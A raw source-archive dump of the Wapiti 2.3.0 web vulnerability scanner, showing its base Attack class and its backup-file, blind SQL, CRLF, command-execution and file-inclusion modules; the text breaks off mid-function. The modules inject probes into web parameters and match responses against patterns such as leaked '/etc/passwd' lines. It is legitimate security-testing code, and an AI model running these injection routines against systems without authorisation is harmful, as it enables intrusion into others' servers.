wapitiCore/report/openvasreportgenerator.py wapitiCore/report/reportgenerator.py wapitiCore/report/reportgeneratorinfo.py wapitiCore/report/txtreportgenerator.py wapitiCore/report/vulneranetxmlreportgenerator.py wapitiCore/report/xmlreportgenerator.py wapitiCore/report_template/index.html wapitiCore/report_template/logo_clear.png wapitiCore/report_template/css/kube.css wapitiCore/report_template/css/kube.min.css wapitiCore/report_template/css/master.css wapitiCore/report_template/js/jquery-1.9.1.min.js wapitiCore/report_template/js/kube.buttons.js wapitiCore/report_template/js/kube.tabs.jswapiti-2.3.0+dfsg/wapiti.egg-info/dependency_links.txt000066400000000000000000000000011240201516300227570ustar00rootroot00000000000000 wapiti-2.3.0+dfsg/wapiti.egg-info/requires.txt000066400000000000000000000000351240201516300213070ustar00rootroot00000000000000requests>=1.2.3 BeautifulSoupwapiti-2.3.0+dfsg/wapiti.egg-info/top_level.txt000066400000000000000000000000131240201516300214350ustar00rootroot00000000000000wapitiCore wapiti-2.3.0+dfsg/wapitiCore/000077500000000000000000000000001240201516300160305ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/__init__.py000066400000000000000000000000001240201516300201270ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/attack/000077500000000000000000000000001240201516300172775ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/attack/__init__.py000066400000000000000000000000001240201516300213760ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/attack/attack.py000066400000000000000000000140141240201516300211200ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2008-2013 Nicolas Surribas # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import os import socket # for trapping socket.error from wapitiCore.file.auxtext import AuxText import requests import sys modules = ["mod_crlf", "mod_exec", "mod_file", "mod_sql", "mod_xss", "mod_backup", "mod_htaccess", "mod_blindsql", "mod_permanentxss", "mod_nikto"] class Attack(object): """ This class represents an attack, it must be extended for any class which implements a new type of attack """ verbose = 0 color = 0 name = "attack" logVuln = None logAnom = None HTTP = None auxText = None doGET = True doPOST = True # List of modules (strs) that must be launched before the current module # Must be defined in the code of the module require = [] # List of modules (objects) that must be launched before the current module # Must be left empty in the code deps = [] # List of attack's url already launched in the current module attackedGET = [] attackedPOST = [] vulnerableGET = [] vulnerablePOST = [] CONFIG_DIR = "" if hasattr(sys, "frozen"): BASE_DIR = os.path.join(os.path.dirname(unicode(sys.executable, sys.getfilesystemencoding())), "data") else: BASE_DIR = os.path.dirname(sys.modules['wapitiCore'].__file__) CONFIG_DIR = os.path.join(BASE_DIR, "config", "attacks") # Color codes STD = "\033[0;0m" RED = "\033[0;31m" GREEN = "\033[0;32m" ORANGE = "\033[0;33m" YELLOW = "\033[1;33m" BLUE = "\033[1;34m" MAGENTA = "\033[0;35m" CYAN = "\033[0;36m" GB = "\033[0;30m\033[47m" allowed = ['php', 'html', 'htm', 'xml', 'xhtml', 'xht', 'xhtm', 'asp', 'aspx', 'php3', 'php4', 'php5', 'txt', 'shtm', 'shtml', 'phtm', 'phtml', 'jhtml', 'pl', 'jsp', 'cfm', 'cfml', 'py'] # The priority of the module, from 0 (first) to 10 (last). Default is 5 PRIORITY = 5 def __init__(self, http, reportGen): self.HTTP = http self.logVuln = reportGen.logVulnerability self.logAnom = reportGen.logAnomaly self.auxText = AuxText() self.attackedGET = [] self.attackedPOST = [] def setVerbose(self, verbose): self.verbose = verbose def setColor(self): self.color = 1 def loadPayloads(self, fileName): """Load the payloads from the specified file""" return self.auxText.readLines(fileName) def attackGET(self, page, params_list, headers={}): return def attackPOST(self, form): return def loadRequire(self, obj=[]): self.deps = obj def log(self, fmt_string, *args): if len(args) == 0: print(fmt_string) else: print(fmt_string.format(*args)) if self.color: sys.stdout.write(self.STD) def logR(self, fmt_string, *args): if self.color: sys.stdout.write(self.RED) self.log(fmt_string, *args) def logG(self, fmt_string, *args): if self.color: sys.stdout.write(self.GREEN) self.log(fmt_string, *args) def logY(self, fmt_string, *args): if self.color: sys.stdout.write(self.YELLOW) self.log(fmt_string, *args) def logC(self, fmt_string, *args): if self.color: sys.stdout.write(self.CYAN) self.log(fmt_string, *args) def logW(self, fmt_string, *args): if self.color: sys.stdout.write(self.GB) self.log(fmt_string, *args) def logM(self, fmt_string, *args): if self.color: sys.stdout.write(self.MAGENTA) self.log(fmt_string, *args) def logB(self, fmt_string, *args): if self.color: sys.stdout.write(self.BLUE) self.log(fmt_string, *args) def logO(self, fmt_string, *args): if self.color: sys.stdout.write(self.ORANGE) self.log(fmt_string, *args) def attack(self, http_resources, forms): if self.doGET is True: for http_res in http_resources: url = http_res.url if self.verbose == 1: self.log(_("+ attackGET {0}"), url) try: self.attackGET(http_res) except socket.error, se: self.log(_('error: {0} while attacking {1}'), repr(str(se[0])), url) except requests.exceptions.Timeout: self.log(_('error: timeout while attacking {0}'), url) #except Exception, e: # self.log(_('error: {0} while attacking {1}'), repr(str(e[0])), url) if self.doPOST is True: for form in forms: if self.verbose == 1: self.log(_("+ attackPOST {0} from {1}"), form.url, form.referer) try: self.attackPOST(form) except socket.error, se: self.log(_('error: {0} while attacking {1}'), repr(str(se[0])), url) except requests.exceptions.Timeout: print(_('error: timeout while attacking {0}').format(url)) # except Exception, e: # self.log(_('error: {0} while attacking {1}'), repr(str(e[0])), url) wapiti-2.3.0+dfsg/wapitiCore/attack/mod_backup.py000066400000000000000000000063731240201516300217660ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2009-2013 Nicolas Surribas # # Original authors : # Anthony DUBOCAGE # Guillaume TRANCHANT # Gregory FONTAINE # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA from wapitiCore.attack.attack import Attack from wapitiCore.language.vulnerability import Vulnerability import socket import os from wapitiCore.net import HTTP class mod_backup(Attack): """ This class implements a "backup attack" """ payloads = [] CONFIG_FILE = "backupPayloads.txt" name = "backup" doGET = False doPOST = False def __init__(self, http, xmlRepGenerator): Attack.__init__(self, http, xmlRepGenerator) self.payloads = self.loadPayloads(os.path.join(self.CONFIG_DIR, self.CONFIG_FILE)) def __returnErrorByCode(self, code): err = "" code = int(code) if code == 404: err = "Not found" if 100 <= code < 300: err = "ok" return err def attackGET(self, http_res): if http_res.file_name == "": return page = http_res.path headers = http_res.headers # Do not attack application-type files if not "content-type" in headers: # Sometimes there's no content-type... so we rely on the document extension if (page.split(".")[-1] not in self.allowed) and page[-1] != "/": return elif not "text" in headers["content-type"]: return for payload in self.payloads: payload = payload.replace("[FILE_NAME]", http_res.file_name) url = page.replace(http_res.file_name, payload) if self.verbose == 2: print(u"+ {0}".format(url)) if url not in self.attackedGET: self.attackedGET.append(url) try: evil_req = HTTP.HTTPResource(url) resp = self.HTTP.send(evil_req) data, code = resp.getPageCode() err = self.__returnErrorByCode(code) if err == "ok": self.logR(_("Found backup file !")) self.logR(u" -> {0}".format(evil_req.url)) self.logVuln(category=Vulnerability.BACKUP, level=Vulnerability.HIGH_LEVEL, request=evil_req, info=_("Backup file {0} found for {1}").format(url, page)) except socket.timeout: break wapiti-2.3.0+dfsg/wapitiCore/attack/mod_blindsql.py000066400000000000000000000276411240201516300223320ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2008-2013 Nicolas Surribas # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA from wapitiCore.attack.attack import Attack from wapitiCore.language.vulnerability import Vulnerability, Anomaly import requests import os from wapitiCore.net import HTTP class mod_blindsql(Attack): """ This class implements an SQL Injection attack """ CONFIG_FILE = "blindSQLPayloads.txt" blind_sql_payloads = [] TIME_TO_SLEEP = 6 name = "blindsql" require = ["sql"] PRIORITY = 6 excludedGET = [] excludedPOST = [] MSG_VULN = _("Blind SQL vulnerability") def __init__(self, http, xmlRepGenerator): Attack.__init__(self, http, xmlRepGenerator) self.blind_sql_payloads = self.loadPayloads(os.path.join(self.CONFIG_DIR, self.CONFIG_FILE)) def setTimeout(self, timeout): self.TIME_TO_SLEEP = str(1 + int(timeout)) # first implementations for blind sql injection... # must had this to Vulnerability type def attackGET(self, http_res): """This method performs the Blind SQL attack with method GET""" page = http_res.path params_list = http_res.get_params resp_headers = http_res.headers referer = http_res.referer headers = {} if referer: headers["referer"] = referer if not params_list: # Do not attack application-type files if not "content-type" in resp_headers: # Sometimes there's no content-type... so we rely on the document extension if (page.split(".")[-1] not in self.allowed) and page[-1] != "/": return elif not "text" in resp_headers["content-type"]: return pattern_url = page + "?__SQL__" if pattern_url in self.excludedGET: return if pattern_url not in self.attackedGET: self.attackedGET.append(pattern_url) err500 = 0 for payload in self.blind_sql_payloads: if "[VALUE]" in payload: continue payload = self.HTTP.quote(payload.replace("__TIME__", self.TIME_TO_SLEEP)) url = page + "?" + payload evil_req = HTTP.HTTPResource(url) if self.verbose == 2: print(u"+ {0}".format(evil_req.url)) try: resp = self.HTTP.send(evil_req, headers=headers) data, code = resp.getPageCode() except requests.exceptions.Timeout: self.logVuln(category=Vulnerability.BLIND_SQL_INJECTION, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter="QUERY_STRING", info=_("{0} via injection in the query string").format(self.MSG_VULN)) self.logR(Vulnerability.MSG_QS_INJECT, self.MSG_VULN, page) self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url) break else: if code == "500" and err500 == 0: err500 = 1 self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, parameter="QUERY_STRING", info=Anomaly.MSG_QS_500) self.logO(Anomaly.MSG_500, page) self.logO(Anomaly.MSG_EVIL_URL, evil_req.url) else: for i in range(len(params_list)): saved_value = params_list[i][1] if saved_value is None: saved_value = "" param_name = self.HTTP.quote(params_list[i][0]) params_list[i][1] = "__SQL__" pattern_url = page + "?" + self.HTTP.encode(params_list) # This field was successfully attacked with a non-blind SQL injection if pattern_url in self.excludedGET: params_list[i][1] = saved_value continue if pattern_url not in self.attackedGET: self.attackedGET.append(pattern_url) err500 = 0 for payload in self.blind_sql_payloads: payload = payload.replace("[VALUE]", saved_value) params_list[i][1] = self.HTTP.quote(payload.replace("__TIME__", self.TIME_TO_SLEEP)) url = page + "?" + self.HTTP.encode(params_list) evil_req = HTTP.HTTPResource(url) if self.verbose == 2: print(u"+ {0}".format(evil_req.url)) try: resp = self.HTTP.send(evil_req, headers=headers) data, code = resp.getPageCode() except requests.exceptions.Timeout: self.logVuln(category=Vulnerability.BLIND_SQL_INJECTION, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter=param_name, info=_("{0} via injection in " "the parameter {1}").format(self.MSG_VULN, param_name)) self.logR(Vulnerability.MSG_PARAM_INJECT, self.MSG_VULN, page, param_name) self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url) # One payload worked. Now jum to next field break else: if code == "500" and err500 == 0: err500 = 1 self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_500.format(param_name)) self.logO(Anomaly.MSG_500, page) self.logO(Anomaly.MSG_EVIL_URL, evil_req.url) params_list[i][1] = saved_value def attackPOST(self, form): """This method performs the Blind SQL attack with method POST""" # copies get_params = form.get_params post_params = form.post_params file_params = form.file_params referer = form.referer for params_list in [get_params, post_params, file_params]: for i in xrange(len(params_list)): saved_value = params_list[i][1] if saved_value is None: saved_value = "" param_name = self.HTTP.quote(params_list[i][0]) if params_list is file_params: params_list[i][1] = ["_SQL__", params_list[i][1][1]] else: params_list[i][1] = "__SQL__" attack_pattern = HTTP.HTTPResource(form.path, method=form.method, get_params=get_params, post_params=post_params, file_params=file_params) if attack_pattern in self.excludedPOST: params_list[i][1] = saved_value continue err500 = 0 if attack_pattern not in self.attackedPOST: self.attackedPOST.append(attack_pattern) for payload in self.blind_sql_payloads: if params_list is file_params: payload = payload.replace("[VALUE]", saved_value[0]) params_list[i][1][0] = payload.replace("__TIME__", self.TIME_TO_SLEEP) else: payload = payload.replace("[VALUE]", saved_value) params_list[i][1] = payload.replace("__TIME__", self.TIME_TO_SLEEP) evil_req = HTTP.HTTPResource(form.path, method=form.method, get_params=get_params, post_params=post_params, file_params=file_params, referer=referer) if self.verbose == 2: print(u"+ {0}".format(evil_req)) try: resp = self.HTTP.send(evil_req) data, code = resp.getPageCode() except requests.exceptions.Timeout: # Timeout means time-based SQL injection self.logVuln(category=Vulnerability.BLIND_SQL_INJECTION, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter=param_name, info=_("{0} via injection in the " "parameter {1}").format(self.MSG_VULN, param_name)) self.logR(Vulnerability.MSG_PARAM_INJECT, self.MSG_VULN, evil_req.url, param_name) self.logR(Vulnerability.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') break else: if code == "500" and err500 == 0: err500 = 1 self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_500.format(param_name)) self.logO(Anomaly.MSG_500, evil_req.url) self.logO(Anomaly.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') params_list[i][1] = saved_value def loadRequire(self, obj=[]): self.deps = obj for x in self.deps: if x.name == "sql": self.excludedGET = x.vulnerableGET self.excludedPOST = x.vulnerablePOST wapiti-2.3.0+dfsg/wapitiCore/attack/mod_crlf.py000066400000000000000000000131771240201516300214470ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2008-2013 Nicolas Surribas # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA from wapitiCore.attack.attack import Attack from wapitiCore.language.vulnerability import Vulnerability, Anomaly import requests from wapitiCore.net import HTTP class mod_crlf(Attack): """ This class implements a CRLF attack """ name = "crlf" MSG_VULN = _("CRLF Injection") doGET = False doPOST = False def __init__(self, http, xmlRepGenerator): Attack.__init__(self, http, xmlRepGenerator) # Won't work with PHP >= 4.4.2 def attackGET(self, http_res): """This method performs the CRLF attack with method GET""" page = http_res.path params_list = http_res.get_params resp_headers = http_res.headers referer = http_res.referer headers = {} if referer: headers["referer"] = referer payload = self.HTTP.quote("http://www.google.fr\r\nwapiti: 2.3.0 version") if not params_list: # Do not attack application-type files if not "content-type" in resp_headers: # Sometimes there's no content-type... so we rely on the document extension if (page.split(".")[-1] not in self.allowed) and page[-1] != "/": return elif not "text" in resp_headers["content-type"]: return url = page + "?" + payload if url not in self.attackedGET: evil_req = HTTP.HTTPResource(url) if self.verbose == 2: print(u"+ {0}".format(evil_req.url)) try: resp = self.HTTP.send(evil_req, headers=headers) if "wapiti" in resp.getHeaders(): self.logVuln(category=Vulnerability.CRLF, level=Vulnerability.HIGH_LEVEL, request=evil_req, info=self.MSG_VULN + " " + _("(QUERY_STRING)")) self.logR(Vulnerability.MSG_QS_INJECT, self.MSG_VULN, page) self.logR(Vulnerability.MSG_EVIL_URL, url) except requests.exceptions.Timeout: self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, info=self.MSG_VULN + " " + _("(QUERY_STRING)")) self.logO(Anomaly.MSG_TIMEOUT, page) self.logO(Anomaly.MSG_EVIL_URL, url) except requests.exceptions.HTTPError: # print("Error: The server did not understand this request") pass self.attackedGET.append(url) else: for i in range(len(params_list)): saved_value = params_list[i][1] if saved_value is None: saved_value = "" # payload is already escaped, see at top params_list[i][1] = payload param_name = self.HTTP.quote(params_list[i][0]) url = page + "?" + self.HTTP.encode(params_list) if url not in self.attackedGET: self.attackedGET.append(url) evil_req = HTTP.HTTPResource(url) if self.verbose == 2: print(u"+ {0}".format(evil_req.url)) try: resp = self.HTTP.send(evil_req, headers=headers) if "wapiti" in resp.getHeaders(): self.logVuln(category=Vulnerability.CRLF, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter=param_name, info=self.MSG_VULN + " (" + param_name + ")") self.logR(Vulnerability.MSG_PARAM_INJECT, self.MSG_VULN, page, param_name) self.logR(Vulnerability.MSG_EVIL_URL, url) except requests.exceptions.Timeout: self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, parameter=param_name, info="Timeout (" + param_name + ")") self.logO(Anomaly.MSG_TIMEOUT, page) self.logO(Anomaly.MSG_EVIL_URL, url) except requests.exceptions.HTTPError: self.log(_("Error: The server did not understand this request")) params_list[i][1] = saved_value wapiti-2.3.0+dfsg/wapitiCore/attack/mod_exec.py000066400000000000000000000341441240201516300214420ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2008-2013 Nicolas Surribas # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA from wapitiCore.attack.attack import Attack from wapitiCore.language.vulnerability import Vulnerability, Anomaly import requests import os from wapitiCore.net import HTTP class mod_exec(Attack): """ This class implements a command execution attack """ CONFIG_FILE = "execPayloads.txt" name = "exec" def __init__(self, http, xmlRepGenerator): Attack.__init__(self, http, xmlRepGenerator) self.payloads = self.loadPayloads(os.path.join(self.CONFIG_DIR, self.CONFIG_FILE)) def __findPatternInResponse(self, data, warned): err = "" cmd = 0 if "eval()'d code on line " in data and not warned: err = ("Warning eval()") warned = 1 if "PATH=" in data and "PWD=" in data: err = _("Command execution") cmd = 1 if "w4p1t1_eval" in data: err = _("PHP evaluation") cmd = 1 if "Cannot execute a blank command in" in data and not warned: err = _("Warning exec") warned = 1 if "sh: command substitution:" in data and not warned: err = _("Warning exec") warned = 1 if "Fatal error: preg_replace" in data and not warned: err = _("preg_replace injection") warned = 1 if "Warning: usort()" in data and not warned: err = _("Warning usort()") warned = 1 if "Warning: preg_replace():" in data and not warned: err = _("preg_replace injection") warned = 1 if "Warning: assert():" in data and not warned: err = _("Warning assert") warned = 1 if "Failure evaluating code:" in data and not warned: err = _("Evalutation warning") warned = 1 return err, cmd, warned def attackGET(self, http_res): """This method performs the command execution with method GET""" page = http_res.path params_list = http_res.get_params resp_headers = http_res.headers referer = http_res.referer headers = {} if referer: headers["referer"] = referer if not params_list: # Do not attack application-type files if not "content-type" in resp_headers: # Sometimes there's no content-type... so we rely on the document extension if (page.split(".")[-1] not in self.allowed) and page[-1] != "/": return elif not "text" in resp_headers["content-type"]: return timeouted = False warned = 0 cmd = 0 err500 = 0 for payload in self.payloads: if "[VALUE]" in payload: continue err = "" url = page + "?" + self.HTTP.quote(payload) if url not in self.attackedGET: evil_req = HTTP.HTTPResource(url) if self.verbose == 2: print(u"+ {0}".format(url)) self.attackedGET.append(url) try: data, code = self.HTTP.send(evil_req, headers=headers).getPageCode() except requests.exceptions.Timeout: if timeouted: continue data = "" code = "408" err = "" self.logO(Anomaly.MSG_TIMEOUT, page) self.logO(Anomaly.MSG_EVIL_URL, evil_req.url) self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, info=Anomaly.MSG_QS_TIMEOUT) timeouted = True else: err, cmd, warned = self.__findPatternInResponse(data, warned) if err != "": self.logVuln(category=Vulnerability.EXEC, level=Vulnerability.HIGH_LEVEL, request=evil_req, info=Vulnerability.MSG_QS_INJECT.format(err, page)) self.logR(Vulnerability.MSG_QS_INJECT, err, page) self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url) else: if code == "500" and err500 == 0: err500 = 1 self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, info=Anomaly.MSG_QS_500) self.logO(Anomaly.MSG_500, page) self.logO(Anomaly.MSG_EVIL_URL, evil_req.url) if cmd: break for i in range(len(params_list)): timeouted = False warned = 0 cmd = 0 err500 = 0 saved_value = params_list[i][1] if saved_value is None: saved_value = "" params_list[i][1] = "__EXEC__" url = page + "?" + self.HTTP.encode(params_list) param_name = self.HTTP.quote(params_list[i][0]) if url not in self.attackedGET: self.attackedGET.append(url) for payload in self.payloads: err = "" payload = payload.replace("[VALUE]", saved_value) params_list[i][1] = self.HTTP.quote(payload) evil_req = HTTP.HTTPResource(page + "?" + self.HTTP.encode(params_list)) if self.verbose == 2: print(u"+ {0}".format(evil_req.url)) try: data, code = self.HTTP.send(evil_req, headers=headers).getPageCode() except requests.exceptions.Timeout: if timeouted: continue data = "" code = "408" err = "" self.logO(Anomaly.MSG_TIMEOUT, page) self.logO(Anomaly.MSG_EVIL_URL, evil_req.url) self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name)) timeouted = True else: err, cmd, warned = self.__findPatternInResponse(data, warned) if err != "": self.logVuln(category=Vulnerability.EXEC, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter=param_name, info=_("{0} via injection in the parameter {1}").format(err, param_name)) self.logR(Vulnerability.MSG_PARAM_INJECT, err, page, param_name) self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url) if cmd: # Successful command execution, go to the next field break else: if code == "500" and err500 == 0: err500 = 1 self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_500.format(param_name)) self.logO(Anomaly.MSG_500, page) self.logO(Anomaly.MSG_EVIL_URL, evil_req.url) params_list[i][1] = saved_value def attackPOST(self, form): """This method performs the command execution with method POST""" # copies get_params = form.get_params post_params = form.post_params file_params = form.file_params referer = form.referer for params_list in [get_params, post_params, file_params]: for i in xrange(len(params_list)): saved_value = params_list[i][1] if saved_value is None: saved_value = "" timeouted = False warned = 0 cmd = 0 err500 = 0 param_name = self.HTTP.quote(params_list[i][0]) if params_list is file_params: params_list[i][1] = ["_EXEC__", params_list[i][1][1]] else: params_list[i][1] = "__EXEC__" attack_pattern = HTTP.HTTPResource(form.path, method=form.method, get_params=get_params, post_params=post_params, file_params=file_params) if attack_pattern not in self.attackedPOST: self.attackedPOST.append(attack_pattern) for payload in self.payloads: # no quoting: send() will do it for us if params_list is file_params: payload = payload.replace("[VALUE]", saved_value[0]) params_list[i][1][0] = payload else: payload = payload.replace("[VALUE]", saved_value) params_list[i][1] = payload evil_req = HTTP.HTTPResource(form.path, method=form.method, get_params=get_params, post_params=post_params, file_params=file_params, referer=referer) if self.verbose == 2: print(u"+ {0}".format(evil_req)) err = "" try: data, code = self.HTTP.send(evil_req).getPageCode() except requests.exceptions.Timeout: if timeouted: continue data = "" code = "408" self.logO(Anomaly.MSG_TIMEOUT, evil_req.url) self.logO(Anomaly.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name)) timeouted = True else: err, cmd, warned = self.__findPatternInResponse(data, warned) if err != "": self.logVuln(category=Vulnerability.EXEC, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter=param_name, info=_("{0} via injection in the parameter {1}").format(err, param_name)) self.logR(Vulnerability.MSG_PARAM_INJECT, err, evil_req.url, param_name) self.logR(Vulnerability.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') if cmd: # Successful command execution, go to the next field break else: if code == "500" and err500 == 0: err500 = 1 self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_500.format(param_name)) self.logO(Anomaly.MSG_500, evil_req.url) self.logO(Vulnerability.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') params_list[i][1] = saved_value wapiti-2.3.0+dfsg/wapitiCore/attack/mod_file.py000066400000000000000000000403121240201516300214270ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2008-2013 Nicolas Surribas # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA from wapitiCore.attack.attack import Attack from wapitiCore.language.vulnerability import Vulnerability, Anomaly import requests import os from wapitiCore.net import HTTP class mod_file(Attack): """ This class implements a file handling attack """ CONFIG_FILE = "fileHandlingPayloads.txt" name = "file" # The following table contains tuples of (pattern, description, severity) # a severity of 1 is a file disclosure (inclusion, read etc) vulnerability # a severity of 0 is just the detection of an error returned by the server # Most important patterns must appear at the top of this table. warnings_desc = [ # Vulnerabilities ("Google", _("Remote inclusion vulnerability"), 1), ("root:x:0:0", _("Linux local file disclosure vulnerability"), 1), ("root:*:0:0", _("BSD local file disclosure vulnerability"), 1), ("[boot loader]", _("Windows local file disclosure vulnerability"), 1), ("s:12:\"pear.php.net\";", _("File disclosure vulnerability in include_path"), 1), ("PHP Extension and Application Reposit", _("File disclosure vulnerability in include_path"), 1), ("PEAR, the PHP Extensio", _("highlight_file() vulnerability in basedir"), 1), ("either use the CLI php executable", _("include() of file in include_path"), 1), # Warnings ("java.io.FileNotFoundException:", "Java include/open", 0), ("fread(): supplied argument is not", "fread()", 0), ("fpassthru(): supplied argument is not", "fpassthru()", 0), ("for inclusion (include_path=", "include()", 0), ("Failed opening required", "require()", 0), ("Warning: file(", "file()", 0), ("Warning: file(", "file()", 0), ("Warning: readfile(", "readfile()", 0), ("Warning: readfile(", "readfile()", 0), ("Warning: file_get_contents(", "file_get_contents()", 0), ("Warning: file_get_contents(", "file_get_contents()", 0), ("Warning: show_source(", "show_source()", 0), ("Warning: show_source(", "show_source()", 0), ("Warning: highlight_file(", "highlight_file()", 0), ("Warning: highlight_file(", "highlight_file()", 0), ("System.IO.FileNotFoundException:", ".NET File.Open*", 0), ("error '800a0046'", "VBScript OpenTextFile", 0) ] def __init__(self, http, xmlRepGenerator): Attack.__init__(self, http, xmlRepGenerator) self.payloads = self.loadPayloads(os.path.join(self.CONFIG_DIR, self.CONFIG_FILE)) def __findPatternInResponse(self, data, warn): """This method searches patterns in the response from the server""" err_msg = "" inc = 0 for pattern, description, level in self.warnings_desc: if pattern in data: if level == 1: err_msg = description inc = 1 break else: if warn == 0: err_msg = _("Possible {0} vulnerability").format(description) warn = 1 break return err_msg, inc, warn def attackGET(self, http_res): """This method performs the file handling attack with method GET""" page = http_res.path params_list = http_res.get_params resp_headers = http_res.headers referer = http_res.referer headers = {} if referer: headers["referer"] = referer if not params_list: # Do not attack application-type files if not "content-type" in resp_headers: # Sometimes there's no content-type... so we rely on the document extension if (page.split(".")[-1] not in self.allowed) and page[-1] != "/": return elif not "text" in resp_headers["content-type"]: return timeouted = False warn = 0 inc = 0 err500 = 0 for payload in self.payloads: if "[VALUE]" in payload or "[DIRVALUE]" in payload or "[FILE_NAME]" in payload: continue err = "" url = page + "?" + self.HTTP.quote(payload) if url not in self.attackedGET: if self.verbose == 2: print(u"+ {0}".format(url)) self.attackedGET.append(url) evil_req = HTTP.HTTPResource(url) try: data, code = self.HTTP.send(evil_req, headers=headers).getPageCode() except requests.exceptions.Timeout: # Display a warning about timeout only once for a parameter if timeouted: continue data = "" code = "408" err = "" 